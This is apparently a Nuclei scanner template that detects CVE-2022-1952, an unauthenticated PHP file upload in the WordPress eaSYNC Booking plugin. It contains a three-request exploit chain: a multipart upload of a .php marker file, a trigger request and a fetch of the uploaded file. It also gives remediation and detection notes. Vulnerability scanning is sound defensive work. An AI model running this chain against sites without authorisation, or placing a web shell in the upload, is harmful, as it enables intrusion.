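# Nuclei template for CVE-2022-1952 (CWE-434, unauthenticated arbitrary file upload
# in the WordPress eaSYNC Booking plugin before 1.1.16).
#
# Flow (three requests, see `http:` below):
#   1. POST to admin-ajax.php, action=easync_session_store, carrying a `.php`
#      filename in the `driver_license_image2` multipart part.
#   2. GET admin-ajax.php?action=easync_success_and_save with the same PHPSESSID,
#      presumably so the second call sees the session stored by the first.
#   3. GET the stored file under wp-content/uploads/ using the path captured by
#      the internal `filename` extractor, and match on the marker it prints.
#
# Tagged `intrusive`: the template writes a file to the target and has no
# cleanup request, so on a positive result the marker file remains under
# wp-content/uploads/ until removed by the site operator.
#
# Remediation: update the plugin to 1.1.16 or later. Detection signals for
# defenders: POST requests to /wp-admin/admin-ajax.php with
# action=easync_session_store whose multipart body carries a `.php` filename,
# and newly created `.php` files under wp-content/uploads/.

id: CVE-2022-1952

info:
  name: WordPress eaSYNC Booking <1.1.16 - Arbitrary File Upload
  author: theamanrawat
  severity: critical
  description: |
    WordPress eaSync Booking plugin bundle for hotel, restaurant and car rental before 1.1.16 is susceptible to arbitrary file upload. The plugin contains insufficient input validation of an AJAX action. An allowlist of valid file extensions is defined but is not used during the validation steps. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  reference:
    - https://wpscan.com/vulnerability/ecf61d17-8b07-4cb6-93a8-64c2c4fbbe04
    - https://wordpress.org/plugins/easync-booking/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1952
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-1952
    cwe-id: CWE-434
    cpe: cpe:2.3:a:syntactics:free_booking_plugin_for_hotels\,_restaurant_and_car_rental:*:*:*:*:*:*:*:*
    epss-score: 0.96693
  metadata:
    # Three raw requests are sent per target (matches the `raw:` list below).
    max-request: 3
    verified: true
  tags: cve,cve2022,wpscan,wordpress,easync-booking,unauth,wp,file-upload,wp-plugin,intrusive

http:
  # The PHPSESSID value is a fixed, template-chosen session id; it is repeated
  # on requests 1 and 2 so both hit the same server-side session.
  # The multipart boundary is a fixed string as well; the two boundary values
  # below must stay in sync (header value = delimiter without the leading "--").
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Cookie: PHPSESSID=a0d5959357e474aef655313f69891f37
        Content-Type: multipart/form-data; boundary=------------------------98efee55508c5059

        --------------------------98efee55508c5059
        Content-Disposition: form-data; name="action"

        easync_session_store
        --------------------------98efee55508c5059
        Content-Disposition: form-data; name="type"

        car
        --------------------------98efee55508c5059
        Content-Disposition: form-data; name="with_driver"

        self-driven
        --------------------------98efee55508c5059
        Content-Disposition: form-data; name="driver_license_image2"; filename="{{randstr}}.php"
        Content-Type: application/octet-stream

        <?php echo md5('CVE-2022-1952');?>

        --------------------------98efee55508c5059--

      - |
        GET /wp-admin/admin-ajax.php?action=easync_success_and_save HTTP/1.1
        Host: {{Hostname}}
        Cookie: PHPSESSID=a0d5959357e474aef655313f69891f37

      - |
        GET /wp-content/uploads/{{filename}}.php HTTP/1.1
        Host: {{Hostname}}

    # req-condition lets the DSL matcher reference per-request variables
    # (body_1, status_code_3, ...) across all three responses.
    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - contains(all_headers_3, "text/html")
          - status_code_3 == 200
          # Request 1 must report success before the stored file is checked.
          - contains(body_1, 'success\":true')
          # Presumably the md5 digest printed by the uploaded marker file
          # (md5('CVE-2022-1952')) — confirm if the marker is ever changed.
          - contains(body_3, 'e0d7fcf2c9f63143b6278a3e40f6bea9')
        condition: and

    extractors:
      # Captures the stored file's basename from the upload response; it is
      # marked `internal` so it feeds request 3 ({{filename}}) and is not
      # reported as output.
      - type: regex
        name: filename
        group: 1
        regex:
          - 'wp-content\\\/uploads\\\/([0-9a-zA-Z]+).php'
        internal: true

# Enhanced by md on 2023/04/07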